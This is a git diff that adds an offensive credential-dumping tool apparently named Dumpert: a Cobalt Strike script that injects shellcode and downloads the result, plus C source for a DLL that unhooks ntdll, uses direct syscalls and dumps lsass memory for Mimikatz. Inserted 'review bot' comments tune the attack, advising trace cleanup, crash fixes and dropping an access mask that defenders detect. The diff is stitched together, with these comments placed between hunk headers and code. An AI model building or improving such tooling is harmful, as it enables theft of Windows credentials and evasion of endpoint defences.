diff --git a/Dumpert-Aggressor/Outflank-Dumpert.bin b/Dumpert-Aggressor/Outflank-Dumpert.bin
new file mode 100644
index 0000000..6101aa6
Binary files /dev/null and b/Dumpert-Aggressor/Outflank-Dumpert.bin differ
diff --git a/Dumpert-Aggressor/Outflank-Dumpert.cna b/Dumpert-Aggressor/Outflank-Dumpert.cna
new file mode 100644
index 0000000..17c58a0
--- /dev/null
+++ b/Dumpert-Aggressor/Outflank-Dumpert.cna
@@ -0,0 +1,35 @@
+#author Cornelis de Plaa
+#@outflank.nl
+
+#injects a sRDI shellcode (shellcode Reflective DLL Injection) in current process and creates a minidump of lsass process.
+#see https://github.com/monoxgas/sRDI
+
+#register help
+beacon_command_register("dumpert", "Create a minidump of lsass process",
+ "Synopsis: dumpert\n\n" .
+ "Creates a minidump of lsass process using sRDI shellcode injection and downloads minidump file.\n" .
+ "Lsass minidump can be imported in Mimikatz using: \"sekurlsa::minidump dumpert.dmp\"");
+
+alias dumpert {
+ $bid = $1;
+ $curr_pid = beacon_info($bid, "pid");
+
+ if (-isadmin $bid) {
+ blog($bid, "Dumpert by Outflank");
+ if (-is64 $bid) {
+ bshinject($bid, $curr_pid, "x64", script_resource("Outflank-Dumpert.bin"));
+ blog($bid, "Waiting a few seconds for task to complete...");
+ bpause($bid, 10000);
+ bdownload($bid, "C:\\Windows\\Temp\\dumpert.dmp");
+ return;
+ }
+ else{
+ berror($bid, "Dumpert is x64 only.");
+ return;
+ }
+ }
+ else{
+ berror($bid, "You need elevated privileges.");
+ return;
+ }
+}
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL.sln b/Dumpert-DLL/Outflank-Dumpert-DLL.sln
new file mode 100755
index 0000000..ba8d097
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL.sln
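Review bot: The fixed `bpause($bid, 10000)` before `bdownload` in this hunk is a race rather than a completion check: the injected shellcode writes a MiniDumpWithFullMemory dump of lsass, which on a host with a large LSASS working set or a slow disk can take longer than ten seconds, and the download then returns a truncated file without any error. Making the wait an optional argument, e.g. `$wait = iff(size(@_) > 1, $2, 10000); bpause($bid, $wait);`, at least lets the operator tune it per target. The download path is hard-coded to `C:\\Windows\\Temp\\dumpert.dmp`, while the DLL in this commit builds its output path from GetWindowsDirectory(), so on a non-default Windows directory the two diverge and the download fails. Nothing removes the dump from disk afterwards; since bdownload is asynchronous, a cleanup such as `brm($bid, "C:\\Windows\\Temp\\dumpert.dmp")` has to be issued once the download has completed rather than queued directly behind it.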
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Express 14 for Windows Desktop
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert-DLL", "Outflank-Dumpert-DLL\Outflank-Dumpert-DLL.vcxproj", "{307088B9-2992-4DE7-A57D-9E657B1CE546}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x64.ActiveCfg = Debug|x64
+ {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x64.Build.0 = Debug|x64
+ {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x86.ActiveCfg = Debug|Win32
+ {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x86.Build.0 = Debug|Win32
+ {307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x64.ActiveCfg = Release|x64
+ {307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x64.Build.0 = Release|x64
+ {307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x86.ActiveCfg = Release|Win32
+ {307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c
new file mode 100755
index 0000000..28ee4e6
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c
@@ -0,0 +1,321 @@
+#undef _UNICODE
+#define _UNICODE
+#undef UNICODE
+#define UNICODE
+
+#include
+#include
+#include "Dumpert.h"
+#include
+
+#pragma comment (lib, "Dbghelp.lib")
+
+
+BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
+ BYTE AssemblyBytes[] = {0x4C, 0x8B, 0xD1, 0xB8, 0xFF};
+
+ if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
+ AssemblyBytes[4] = pWinVerInfo->SystemCall;
+ ZwWriteVirtualMemory = &ZwWriteVirtualMemory10;
+ ZwProtectVirtualMemory = &ZwProtectVirtualMemory10;
+ }
+ else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
+ AssemblyBytes[4] = pWinVerInfo->SystemCall;
+ ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1;
+ ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;
+ }
+ else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
+ AssemblyBytes[4] = pWinVerInfo->SystemCall;
+ ZwWriteVirtualMemory = &ZwWriteVirtualMemory80;
+ ZwProtectVirtualMemory = &ZwProtectVirtualMemory80;
+ }
+ else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
+ AssemblyBytes[4] = pWinVerInfo->SystemCall;
+ ZwWriteVirtualMemory = &ZwWriteVirtualMemory81;
+ ZwProtectVirtualMemory = &ZwProtectVirtualMemory81;
+ }
+ else {
+ return FALSE;
+ }
+
+ LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall);
+
+ ULONG OldProtection, NewProtection;
+ SIZE_T uSize = 10;
+ NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
+ if (status != STATUS_SUCCESS) {
+ return FALSE;
+ }
+
+ status = ZwWriteVirtualMemory(GetCurrentProcess(), lpProcAddress, (PVOID)AssemblyBytes, sizeof(AssemblyBytes), NULL);
+ if (status != STATUS_SUCCESS) {
+ return FALSE;
+ }
+
+ status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection);
+ if (status != STATUS_SUCCESS) {
+ return FALSE;
+ }
+
+ return TRUE;
+}
+
+BOOL GetPID(IN PWIN_VER_INFO pWinVerInfo) {
+ pWinVerInfo->hTargetPID = NULL;
+
+ if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
+ ZwQuerySystemInformation = &ZwQuerySystemInformation10;
+ NtAllocateVirtualMemory = &NtAllocateVirtualMemory10;
+ NtFreeVirtualMemory = &NtFreeVirtualMemory10;
+ }
+ else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
+ ZwQuerySystemInformation = &ZwQuerySystemInformation7SP1;
+ NtAllocateVirtualMemory = &NtAllocateVirtualMemory7SP1;
+ NtFreeVirtualMemory = &NtFreeVirtualMemory7SP1;
+ }
+ else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
+ ZwQuerySystemInformation = &ZwQuerySystemInformation80;
+ NtAllocateVirtualMemory = &NtAllocateVirtualMemory80;
+ NtFreeVirtualMemory = &NtFreeVirtualMemory80;
+ }
+ else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
+ ZwQuerySystemInformation = &ZwQuerySystemInformation81;
+ NtAllocateVirtualMemory = &NtAllocateVirtualMemory81;
+ NtFreeVirtualMemory = &NtFreeVirtualMemory81;
+ }
+ else {
+ return FALSE;
+ }
+
+ ULONG uReturnLength = 0;
+ NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength);
+ if (!status == 0xc0000004) {
+ return FALSE;
+ }
+
+ LPVOID pBuffer = NULL;
+ SIZE_T uSize = uReturnLength;
+ status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
+ if (status != 0) {
+ return FALSE;
+ }
+
+ status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength);
+ if (status != 0) {
+ return FALSE;
+ }
+
+ _RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
+ GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");
+ if (RtlEqualUnicodeString == NULL) {
+ return FALSE;
+ }
+
+ PSYSTEM_PROCESSES pProcInfo = (PSYSTEM_PROCESSES)pBuffer;
+ do {
+ if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &pWinVerInfo->ProcName, TRUE)) {
+ pWinVerInfo->hTargetPID = pProcInfo->ProcessId;
+ break;
+ }
+ pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta);
+
+ } while (pProcInfo);
+
+ status = NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE);
+
+ if (pWinVerInfo->hTargetPID == NULL) {
+ return FALSE;
+ }
+
+ return TRUE;
+}
+
+BOOL IsElevated() {
+ BOOL fRet = FALSE;
+ HANDLE hToken = NULL;
+ if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
+ TOKEN_ELEVATION Elevation = { 0 };
+ DWORD cbSize = sizeof(TOKEN_ELEVATION);
+ if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
+ fRet = Elevation.TokenIsElevated;
+ }
+ }
+ if (hToken) {
+ CloseHandle(hToken);
+ }
+ return fRet;
+}
+
+BOOL SetDebugPrivilege() {
+ HANDLE hToken = NULL;
+ TOKEN_PRIVILEGES TokenPrivileges = { 0 };
+
+ if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
+ return FALSE;
+ }
+
+ TokenPrivileges.PrivilegeCount = 1;
+ TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
+
+ LPWSTR lpwPriv = L"SeDebugPrivilege";
+ if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
+ CloseHandle(hToken);
+ return FALSE;
+ }
+
+ if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
+ CloseHandle(hToken);
+ return FALSE;
+ }
+
+ CloseHandle(hToken);
+ return TRUE;
+}
+
+__declspec(dllexport) void __cdecl Dump() {
+
+ if (sizeof(LPVOID) != 8) {
+ exit(1);
+ }
+
+ if (!IsElevated()) {
+ exit(1);
+ }
+
+ SetDebugPrivilege();
+
+ PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO));
+
+ // First set OS Version/Architecture specific values
+ OSVERSIONINFOEXW osInfo;
+ osInfo.dwOSVersionInfoSize = sizeof(osInfo);
+
+ _RtlGetVersion RtlGetVersion = (_RtlGetVersion)
+ GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion");
+ if (RtlGetVersion == NULL) {
+ exit(1);
+ }
+
+ RtlGetVersion(&osInfo);
+ swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion);
+ pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber;
+
+ // Now create os/build specific syscall function pointers.
+ if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
+ ZwOpenProcess = &ZwOpenProcess10;
+ ZwClose = &ZwClose10;
+ NtCreateFile = &NtCreateFile10;
+ pWinVerInfo->SystemCall = 0x3F;
+ }
+ else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && osInfo.dwBuildNumber == 7601) {
+ ZwOpenProcess = &ZwOpenProcess7SP1;
+ ZwClose = &ZwClose7SP1;
+ NtCreateFile = &NtCreateFile7SP1;
+ pWinVerInfo->SystemCall = 0x3C;
+ }
+ else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
+ ZwOpenProcess = &ZwOpenProcess80;
+ ZwClose = &ZwClose80;
+ NtCreateFile = &NtCreateFile80;
+ pWinVerInfo->SystemCall = 0x3D;
+ }
+ else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
+ ZwOpenProcess = &ZwOpenProcess81;
+ ZwClose = &ZwClose81;
+ NtCreateFile = &NtCreateFile81;
+ pWinVerInfo->SystemCall = 0x3E;
+ }
+ else {
+ exit(1);
+ }
+
+ _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
+ GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
+ if (RtlInitUnicodeString == NULL) {
+ exit(1);
+ }
+
+ RtlInitUnicodeString(&pWinVerInfo->ProcName, L"lsass.exe");
+
+ if (!GetPID(pWinVerInfo)) {
+ exit(1);
+ }
+
+ pWinVerInfo->lpApiCall = "NtReadVirtualMemory";
+
+ if (!Unhook_NativeAPI(pWinVerInfo)) {
+ exit(1);
+ }
+
+ HANDLE hProcess = NULL;
+ OBJECT_ATTRIBUTES ObjectAttributes;
+ InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
+ CLIENT_ID uPid = { 0 };
+
+ uPid.UniqueProcess = pWinVerInfo->hTargetPID;
+ uPid.UniqueThread = (HANDLE)0;
+
+ NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &uPid);
+ if (hProcess == NULL) {
+ exit(1);
+ }
+
+ WCHAR chDmpFile[MAX_PATH] = L"\\??\\";
+ WCHAR chWinPath[MAX_PATH];
+ GetWindowsDirectory(chWinPath, MAX_PATH);
+ wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), chWinPath);
+ wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), L"\\Temp\\dumpert.dmp");
+
+ UNICODE_STRING uFileName;
+ RtlInitUnicodeString(&uFileName, chDmpFile);
+
+ HANDLE hDmpFile = NULL;
+ IO_STATUS_BLOCK IoStatusBlock;
+ ZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock));
+ OBJECT_ATTRIBUTES FileObjectAttributes;
+ InitializeObjectAttributes(&FileObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);
+
+ // Open input file for writing, overwrite existing file.
+ status = NtCreateFile(&hDmpFile, FILE_GENERIC_WRITE, &FileObjectAttributes, &IoStatusBlock, 0,
+ FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
+
+ if (hDmpFile == INVALID_HANDLE_VALUE) {
+ ZwClose(hProcess);
+ exit(1);
+ }
+
+ DWORD dwTargetPID = GetProcessId(hProcess);
+ BOOL Success = MiniDumpWriteDump(hProcess,
+ dwTargetPID,
+ hDmpFile,
+ MiniDumpWithFullMemory,
+ NULL,
+ NULL,
+ NULL);
+
+ ZwClose(hDmpFile);
+ ZwClose(hProcess);
+
+ return;
+}
+
+BOOL APIENTRY DllMain(
+ HINSTANCE hinstDLL,
+ DWORD fdwReason,
+ LPVOID lpReserved)
+{
+
+ switch (fdwReason)
+ {
+ case DLL_PROCESS_ATTACH:
+ Dump();
+ break;
+ case DLL_THREAD_ATTACH:
+ break;
+ case DLL_THREAD_DETACH:
+ break;
+ case DLL_PROCESS_DETACH:
+ break;
+ }
+ return TRUE;
+}
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.h b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.h
new file mode 100755
index 0000000..5034900
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.h
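Review bot: The process-list walk in GetPID in this hunk never terminates when lsass.exe is not found: the last SYSTEM_PROCESSES entry has NextEntryDelta == 0 (the documented end marker of the SystemProcessInformation list), so `pProcInfo + 0` is the same non-NULL pointer and `while (pProcInfo)` spins forever; add `if (pProcInfo->NextEntryDelta == 0) break;` before advancing. Two status checks in the same hunk are ineffective: `if (!status == 0xc0000004)` parses as `(!status) == 0xc0000004` and is always false (intended: `if (status != 0xc0000004)`), and `if (hDmpFile == INVALID_HANDLE_VALUE)` after NtCreateFile can never fire because the handle is initialised to NULL and is left NULL on failure — test `status != STATUS_SUCCESS` (or `hDmpFile == NULL`) there. The result of MiniDumpWriteDump is stored in `Success` and then discarded, so a dump refused by the kernel (for instance when LSA protection blocks the read) still leaves a truncated dumpert.dmp behind for the Aggressor script to download as if it had succeeded. Because Dump() runs from DLL_PROCESS_ATTACH and every failure path calls exit(1), any of these errors terminates the host process the DLL was injected into; an in-process payload should return instead. ZwOpenProcess also asks for PROCESS_ALL_ACCESS although MiniDumpWriteDump needs only PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, and a 0x1FFFFF access mask on an lsass handle is one of the most common detection signatures for this technique.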
@@ -0,0 +1,209 @@
+#pragma once
+
+#include
+
+#define STATUS_SUCCESS 0
+#define OBJ_CASE_INSENSITIVE 0x00000040L
+#define FILE_OVERWRITE_IF 0x00000005
+#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
+typedef LONG KPRIORITY;
+
+#define InitializeObjectAttributes( i, o, a, r, s ) { \
+ (i)->Length = sizeof( OBJECT_ATTRIBUTES ); \
+ (i)->RootDirectory = r; \
+ (i)->Attributes = a; \
+ (i)->ObjectName = o; \
+ (i)->SecurityDescriptor = s; \
+ (i)->SecurityQualityOfService = NULL; \
+ }
+
+typedef struct _UNICODE_STRING {
+ USHORT Length;
+ USHORT MaximumLength;
+ PWSTR Buffer;
+} UNICODE_STRING, *PUNICODE_STRING;
+
+typedef const UNICODE_STRING* PCUNICODE_STRING;
+
+typedef struct _WIN_VER_INFO {
+ WCHAR chOSMajorMinor[8];
+ DWORD dwBuildNumber;
+ UNICODE_STRING ProcName;
+ HANDLE hTargetPID;
+ LPCSTR lpApiCall;
+ INT SystemCall;
+} WIN_VER_INFO, *PWIN_VER_INFO;
+
+typedef struct _OBJECT_ATTRIBUTES {
+ ULONG Length;
+ HANDLE RootDirectory;
+ PUNICODE_STRING ObjectName;
+ ULONG Attributes;
+ PVOID SecurityDescriptor;
+ PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
+
+typedef struct _CLIENT_ID {
+ HANDLE UniqueProcess;
+ HANDLE UniqueThread;
+} CLIENT_ID, *PCLIENT_ID;
+
+typedef enum _SYSTEM_INFORMATION_CLASS {
+ SystemBasicInformation,
+ SystemProcessorInformation,
+ SystemPerformanceInformation,
+ SystemTimeOfDayInformation,
+ SystemPathInformation,
+ SystemProcessInformation,
+ SystemCallCountInformation,
+ SystemDeviceInformation,
+ SystemProcessorPerformanceInformation,
+ SystemFlagsInformation,
+ SystemCallTimeInformation,
+ SystemModuleInformation
+} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
+
+typedef struct _SYSTEM_PROCESSES {
+ ULONG NextEntryDelta;
+ ULONG ThreadCount;
+ ULONG Reserved1[6];
+ LARGE_INTEGER CreateTime;
+ LARGE_INTEGER UserTime;
+ LARGE_INTEGER KernelTime;
+ UNICODE_STRING ProcessName;
+ KPRIORITY BasePriority;
+ HANDLE ProcessId;
+ HANDLE InheritedFromProcessId;
+} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;
+
+typedef struct _IO_STATUS_BLOCK
+{
+ union
+ {
+ LONG Status;
+ PVOID Pointer;
+ };
+ ULONG Information;
+} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
+
+
+// Windows 7 SP1 / Server 2008 R2 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess7SP1(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose7SP1(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation7SP1(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile7SP1(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+// Windows 8 / Server 2012 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess80(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose80(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation80(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile80(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+
+// Windows 8.1 / Server 2012 R2 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess81(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose81(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation81(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile81(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+
+// Windows 10 / Server 2016 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose10(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+NTSTATUS(*NtAllocateVirtualMemory)(
+ HANDLE ProcessHandle,
+ PVOID *BaseAddress,
+ ULONG_PTR ZeroBits,
+ PSIZE_T RegionSize,
+ ULONG AllocationType,
+ ULONG Protect
+ );
+
+NTSTATUS(*NtFreeVirtualMemory)(
+ HANDLE ProcessHandle,
+ PVOID *BaseAddress,
+ IN OUT PSIZE_T RegionSize,
+ ULONG FreeType
+ );
+
+NTSTATUS(*ZwOpenProcess)(
+ PHANDLE ProcessHandle,
+ ACCESS_MASK DesiredAccess,
+ POBJECT_ATTRIBUTES ObjectAttributes,
+ PCLIENT_ID ClientId
+ );
+
+NTSTATUS(WINAPI *ZwQuerySystemInformation)(
+ SYSTEM_INFORMATION_CLASS SystemInformationClass,
+ PVOID SystemInformation,
+ ULONG SystemInformationLength,
+ PULONG ReturnLength
+ );
+
+NTSTATUS(*ZwWriteVirtualMemory)(
+ HANDLE hProcess,
+ PVOID lpBaseAddress,
+ PVOID lpBuffer,
+ SIZE_T NumberOfBytesToRead,
+ PSIZE_T NumberOfBytesRead
+ );
+
+NTSTATUS(*ZwProtectVirtualMemory)(
+ IN HANDLE ProcessHandle,
+ IN PVOID* BaseAddress,
+ IN SIZE_T* NumberOfBytesToProtect,
+ IN ULONG NewAccessProtection,
+ OUT PULONG OldAccessProtection
+ );
+
+NTSTATUS(*NtCreateFile)(
+ PHANDLE FileHandle,
+ ACCESS_MASK DesiredAccess,
+ POBJECT_ATTRIBUTES ObjectAttributes,
+ PIO_STATUS_BLOCK IoStatusBlock,
+ PLARGE_INTEGER AllocationSize,
+ ULONG FileAttributes,
+ ULONG ShareAccess,
+ ULONG CreateDisposition,
+ ULONG CreateOptions,
+ PVOID EaBuffer,
+ ULONG EaLength
+ );
+
+NTSTATUS(*ZwClose)(
+ IN HANDLE KeyHandle
+ );
+
+typedef NTSTATUS(NTAPI *_RtlGetVersion)(
+ LPOSVERSIONINFOEXW lpVersionInformation
+ );
+
+typedef void (WINAPI* _RtlInitUnicodeString)(
+ PUNICODE_STRING DestinationString,
+ PCWSTR SourceString
+ );
+
+typedef NTSYSAPI BOOLEAN(NTAPI *_RtlEqualUnicodeString)(
+ PUNICODE_STRING String1,
+ PCUNICODE_STRING String2,
+ BOOLEAN CaseInSensitive
+ );
